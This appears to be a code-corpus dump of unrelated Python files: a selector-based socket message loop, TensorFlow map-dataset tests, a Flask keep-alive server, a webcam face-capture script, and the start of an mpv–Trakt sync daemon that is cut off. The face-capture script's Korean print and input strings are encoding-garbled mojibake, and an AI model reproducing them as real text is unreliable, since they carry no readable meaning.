# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import logging
import socket
import selectors
import threading
__all__ = ["SelectorLoop"]
logger = logging.getLogger(__name__)
RECV_BUF_SIZE = 32
class TerminateLoop(Exception): pass
class SelectorLoop(object):
"""Wrapper around a Selector object providing a background message loop.
"""
def __init__(self, selectorcls=selectors.DefaultSelector):
super().__init__()
# Multiplexer for all sockets:
self.selector = selectorcls()
# Class logger instance:
self._log = logger.getChild(self.__class__.__name__)
# A dummy socket pair for waking up the message-loop:
self.notifier, self.event = None, None
# Background thread:
self.worker = None
def _handle_event(self, sock, _):
# Just drain the event socket buffer:
data = sock.recv(RECV_BUF_SIZE)
if not data:
raise TerminateLoop()
def __len__(self):
"""Returns the number of registered callbacks."""
reg = self.selector.get_map()
if self.event and self.event in reg:
return len(reg) - 1
else:
return len(reg)
def register(self, conn, callback, data=None):
"""Registers a new connection object.
"""
try:
self.selector.register(conn, selectors.EVENT_READ, (callback, data))
self.notify()
except ValueError as e:
# The conn object was already closed, so call the callback to
# trigger any cleanup routines from the caller
self._log.debug("Registering invalid connection %s: %r",
conn, e, exc_info=1)
callback(conn, data)
def deregister(self, conn):
try:
self.selector.unregister(conn)
# No need to wake the main loop here
except (KeyError, ValueError):
pass
def notify(self):
"""Wake the main message loop."""
if self.notifier:
try:
self.notifier.send(b'x')
except (AttributeError, OSError):
# socket already closed, just ignore
pass
def is_alive(self):
return self.worker is not None and self.worker.is_alive()
def start(self):
"""Starts the message loop thread."""
if self.worker is None:
self.worker = threading.Thread(target=self.run, daemon=True)
self.worker.start()
def stop(self):
"""Stops the message loop thread."""
if self.notifier:
try:
self.notifier.close()
except (AttributeError, OSError):
pass
def run(self):
try:
self.notifier, self.event = socket.socketpair()
self.selector.register(self.event, selectors.EVENT_READ,
(self._handle_event, None))
while True:
events = self.selector.select()
for key, _ in events:
callback, aux = key.data
try:
callback(key.fileobj, aux)
except socket.error as e:
if key.fileobj is self.event:
self._log.error("Notifier socket failed: %r", e)
break
else:
self._log.debug(
"socket.error when receiving from %s: %r",
key, e, exc_info=1)
self.deregister(key.fileobj)
except TerminateLoop:
pass
except Exception as e:
self._log.error("Message loop terminated abnormally: %r", e)
self._log.debug("Uncaught exception %r", e, exc_info=1)
finally:
if self.notifier:
try:
self.notifier.close()
except OSError:
pass
if self.event:
self.deregister(self.event)
try:
self.event.close()
except OSError:
pass
self.notifier, self.event = None, None
self.worker = None
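# Usage sketch (hypothetical `sock`, standing for any readable socket or
# file-like object accepted by the selector):
#
#   loop = SelectorLoop()
#   loop.start()
#   loop.register(sock, lambda conn, aux: conn.recv(4096))
#   ...
#   loop.deregister(sock)
#   loop.stop()
#
# register() and stop() rely on the socketpair created in run(): writing to
# (or closing) the notifier end wakes the blocking selector.select() call.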
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import os
import threading
import numpy as np
from tensorflow.contrib.data.python.kernel_tests import dataset_serialization_test_base
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.contrib.data.python.ops import error_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_threads,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_threads = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(components, count, num_threads,
output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_threads_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_threads_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_threads_val, output_buffer_size_val)
def testImplicitDisposeParallelMapDataset(self):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message")).apply(
error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message"),
num_threads=2,
output_buffer_size=2).apply(error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReadFileIgnoreError(self):
def write_string_to_file(value, filename):
with open(filename, "w") as f:
f.write(value)
filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
for i in range(5)]
for filename in filenames:
write_string_to_file(filename, filename)
dataset = (dataset_ops.Dataset.from_tensor_slices(filenames).map(
io_ops.read_file, num_threads=2, output_buffer_size=2).apply(
error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# All of the files are present.
sess.run(init_op)
for filename in filenames:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Delete one of the files.
os.remove(filenames[0])
# Attempting to read filenames[0] will fail, but ignore_errors()
# will catch the error.
sess.run(init_op)
for filename in filenames[1:]:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
print(sess.run(get_next))
print(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: (queue.dequeue(), queue_2.dequeue()))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for i in range(100):
self.assertEqual(sorted([elements[i * 2], elements[i * 2 + 1]]),
sorted(sess.run(get_next)))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
with self.test_session() as sess:
with self.assertRaisesRegexp(errors.FailedPreconditionError,
"Failed to capture resource"):
sess.run(init_op)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapNamedtuple(self, count=10):
# construct dataset of tuples
labels = dataset_ops.Dataset.range(count)
images = labels.map(lambda l: -l)
dataset_tuple = dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = dataset_tuple.map(example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = dataset_tuple.map(preprocess_tuple)
dataset_namedtuple = dataset_namedtuple.map(preprocess_namedtuple)
next_tuple = dataset_tuple.make_one_shot_iterator().get_next()
next_namedtuple = dataset_namedtuple.make_one_shot_iterator().get_next()
# make sure both datasets contain the same data
with self.test_session() as sess:
for i in range(count):
tuple_, namedtuple_ = sess.run([next_tuple, next_namedtuple])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_namedtuple)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
dataset_ops.Dataset.range(100)
.map(_map_fn)
.prefetch(buffer_size_placeholder)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (dataset_ops.Dataset.range(10)
.map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def assertSparseValuesEqual(self, a, b):
self.assertAllEqual(a.indices, b.indices)
self.assertAllEqual(a.values, b.values)
self.assertAllEqual(a.dense_shape, b.dense_shape)
def testSparse(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
iterator = (dataset_ops.Dataset.range(10)
.map(_sparse)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _sparse(i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testSparseChain(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
iterator = (
dataset_ops.Dataset.range(10).map(_sparse).map(_check)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _check(_sparse(i)).eval())
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureResourceInMapFn(self):
def _build_ds(iterator):
def _map_fn(x):
get_next = iterator.get_next()
return x * get_next
return dataset_ops.Dataset.range(10).map(_map_fn)
def _build_graph():
captured_iterator = dataset_ops.Dataset.range(
10).make_initializable_iterator()
ds = _build_ds(captured_iterator)
iterator = ds.make_initializable_iterator()
init_op = iterator.initializer
return captured_iterator.initializer, init_op
with ops.Graph().as_default() as g:
captured_init_op, init_op = _build_graph()
with self.test_session(graph=g) as sess:
sess.run(captured_init_op)
with self.assertRaises(errors.UnimplementedError):
# CapturedFunction does not support capturing IteratorResource.
sess.run(init_op)
class MapDatasetSerializationTest(
dataset_serialization_test_base.DatasetSerializationTestBase):
def setUp(self):
self._tensor_slice_len = 7
self._num_epochs = 14
self._num_outputs = self._tensor_slice_len * self._num_epochs
def _build_ds(self, multiplier=37.0):
components = (np.arange(self._tensor_slice_len), np.array([[1, 2, 3]]) *
np.arange(self._tensor_slice_len)[:, np.newaxis],
np.array(multiplier) * np.arange(self._tensor_slice_len))
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(self._num_epochs))
def testSaveRestoreCore(self):
self.run_core_tests(
self._build_ds,
lambda: self._build_ds(multiplier=15.0),
self._num_outputs)
def testSaveStatefulFunction(self):
def _build_ds():
def _map_fn(x):
return random_ops.random_uniform(
(), 0, 10, dtype=dtypes.int32) * math_ops.to_int32(x)
return dataset_ops.Dataset.range(100).map(_map_fn)
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureVariableInMapFn(self):
def _build_ds():
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
return (dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda _: counter_var.assign_add(1)))
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
def testBuildDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
@function.Defun(dtypes.int32)
def defun_fn_deep(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return constant_op.constant(11000) + defun_fn_deep(math_ops.to_int32(x))
return dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
class IgnoreErrorsSerializationTest(
dataset_serialization_test_base.DatasetSerializationTestBase):
def _build_ds(self, components):
return dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message")).apply(
error_ops.ignore_errors())
def testIgnoreErrorsCore(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
diff_components = np.array([1., 2., 3., np.nan]).astype(np.float32)
num_outputs = 4
self.run_core_tests(lambda: self._build_ds(components),
lambda: self._build_ds(diff_components), num_outputs)
if __name__ == "__main__":
test.main()
|
webserver.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Webserver OK, Discord Bot OK"
def run():
app.run(host = "0.0.0.0", port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
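# Typical use (assumption: called from the bot's entry point, so the Flask
# thread keeps the hosting platform from idling the process):
#
#   keep_alive()
#   bot.run(TOKEN)  # TOKEN is a placeholder for the Discord bot token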
|
detectnsaveimg.py
|
import numpy as np
import cv2
import os,shutil
import dlib
face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')
cam = cv2.VideoCapture(0) # Create Camera Object(cam)
datacount=0
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
def facedetection():
global datacount
print("์ผ๊ตด ์ธ์์ ์ํ ์ผ๊ตด ๋ฐ์ดํฐ๋ฅผ ๊ตฌ์ฑํฉ๋๋ค. . ")
train_name=input("์ด๋ฆ์ ์
๋ ฅํ์ธ์:")
print("%s์ ์ผ๊ตด ์ธ์ ๋ฐ์ดํฐ์์ฑ์ ์์ํฉ๋๋ค"%train_name)
if os.path.exists("train-images/%s/"%train_name):
shutil.rmtree("train-images/%s/"%train_name)
os.makedirs("train-images/%s/"%train_name)
while True:
_,frame = cam.read()
#getfaceThread = threading.Thread(target=getface, args=(frame,))
#getfaceThread.start()
#getfaceThread.join() #wait ROI frame data for getface()
flag,ret=getface(frame)
        if flag == 1:
            cv2.imwrite("train-images/%s/frontface%d.jpg" % (train_name, datacount), ret)
            datacount += 1
            # stop once enough samples (50) have been collected
            if datacount > 50:
                print("Data collection finished.")
                datacount = 0
                return
        else:  # face detection failed
            print("Face not detected!", end='\r', flush=True)
cv2.imshow("cam",ret)
cv2.waitKey(10)
def getface(frame):
    # frame comes from a cv2.VideoCapture camera; detect a face and return
    # (1, cropped_face) on success or (0, original_frame) on failure
grayframe = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # image binary
    faces = face_cascade.detectMultiScale(grayframe, 1.3, 5)  # Haar result is unused; the dlib detector below drives the crop
    detected_faces = detector(grayframe, 1)  # dlib-based detector
    for rect in detected_faces:  # rect: bounding box of one detected face
x = rect.left()
y = rect.top()
w = rect.right() - rect.left()
h = rect.bottom() - rect.top()
cropframe = frame[y:y+h,x:x+w]
cropframe= cv2.resize(cropframe,(96,96), interpolation=cv2.INTER_AREA)
print("์ผ๊ตด ์ธ์ ์ค. .[%d%%]"% ((datacount/50)*100) ,end="\r",flush=True)
return (1,cropframe)
return (0,frame)
def caminit():
    if not cam.isOpened():  # camera check
        print("Camera not detected.")
def main():
facedetection()
if __name__=='__main__':
caminit()
main()
|
sync_daemon.py
|
#!/usr/bin/env python3
import json
import logging
import sys
import threading
import time
import urllib.parse
import guessit
import os
import requests
import mpv
import trakt_key_holder
import trakt_v2_oauth
log = logging.getLogger('mpvTraktSync')
TRAKT_ID_CACHE_JSON = 'trakt_ids.json'
config = None
last_is_paused = None
last_playback_position = None
last_working_dir = None
last_path = None
last_duration = None
last_file_start_timestamp = None
is_local_state_dirty = True
next_sync_timer = None
next_regular_timer = None
def on_command_response(monitor, command, response):
log.debug('on_command_response(%s, %s)' % (command, response))
global last_is_paused, last_playback_position, last_working_dir, last_path, last_duration, last_file_start_timestamp
global next_sync_timer
last_command_elements = command['command']
if last_command_elements[0] == 'get_property':
if response['error'] != 'success':
log.warning('Command %s failed: %s', command, response)
else:
if last_command_elements[1] == 'pause':
last_is_paused = response['data']
if not last_is_paused and last_file_start_timestamp is None:
last_file_start_timestamp = time.time()
elif last_command_elements[1] == 'percent-pos':
last_playback_position = response['data']
elif last_command_elements[1] == 'working-directory':
last_working_dir = response['data']
elif last_command_elements[1] == 'path':
last_path = response['data']
elif last_command_elements[1] == 'duration':
last_duration = response['data']
log.debug('is_local_state_dirty: %s\nlast_is_paused: %s\nlast_playback_position: %s\nlast_working_dir: %s\nlast_path: %s\nlast_duration: %s',
is_local_state_dirty, last_is_paused, last_playback_position, last_working_dir, last_path, last_duration)
if is_local_state_dirty \
and last_is_paused is not None \
and last_playback_position is not None \
and last_working_dir is not None \
and last_path is not None \
and last_duration is not None:
if next_sync_timer is not None:
next_sync_timer.cancel()
next_sync_timer = threading.Timer(config['seconds_between_mpv_event_and_trakt_sync'], sync_to_trakt,
(last_is_paused, last_playback_position, last_working_dir, last_path,
last_duration, last_file_start_timestamp, False))
next_sync_timer.start()
def on_event(monitor, event):
log.debug('on_event(%s)' % (event))
event_name = event['event']
